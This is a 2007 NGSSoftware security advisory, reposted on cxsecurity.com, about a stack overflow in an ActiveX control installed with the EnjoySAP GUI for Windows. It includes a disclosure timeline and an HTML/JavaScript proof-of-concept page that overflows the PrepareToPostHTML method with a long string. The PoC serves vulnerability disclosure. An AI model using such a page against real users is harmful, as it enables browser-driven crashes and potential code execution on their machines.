EnjoySAP, SAP GUI for Windows - Stack Overflow

2007.07.11
Risk: High
Local: No
Remote: Yes
CWE: N/A

======= Summary ======= Name: EnjoySAP, SAP GUI for Windows - Stack Overflow Release Date: 5 July 2007 Reference: NGS00483 Discover: Mark Litchfield <mark (at) ngssoftware (dot) com [email concealed]> Vendor: SAP Vendor Reference: SECRES-289 Systems Affected: All Versions Risk: High Status: Fixed ======== TimeLine ======== Discovered: 4 January 2007 Released: 19 January 2007 Approved: 29 January 2007 Reported: 11 January 2007 Fixed: 18 May 2007 Published: =========== Description =========== EnjoySAP, also know as Enjoy is the most popular SAP GUI used today. The latest version can be obtained from ftp://ftp.sap.com/pub/sapgui/win/ When installing EnjoySAP, in appreciation of its vast size for being a client (around 500MB), there are an astounding 1102 ActiveX controls installed. A relatively brief examinaton of these controls, found a large number of instances that would terminate EnjoySAP process, there were a number that could create files on the file system (there unfortunately exists no ability to inject content into these created files) and a number of bufferoverruns. ================= Technical Details ================= Control - kweditcontrol.kwedit.1 (Marked Safe For Scripting) Function - PrepareToPostHTML DLL Path - C:Program FilesSAPFrontEndSapGuikwedit.dll POC: <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT type=text/javascript> function init() { var foo = ""; for(var icount = 0; icount < 1060; icount++) { foo = foo + "x"; } var ngssoftware; ngssoftware = new ActiveXObject("kweditcontrol.kwedit.1"); ngssoftware["PrepareToPostHTML"](foo); } //--> </SCRIPT> </HEAD> <BODY bgColor=#ffffff onload=init()> </BODY></HTML> =============== Fix Information =============== Please enrue you are running the latest version NGSSoftware Insight Security Research http://www.ngssoftware.com/ http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top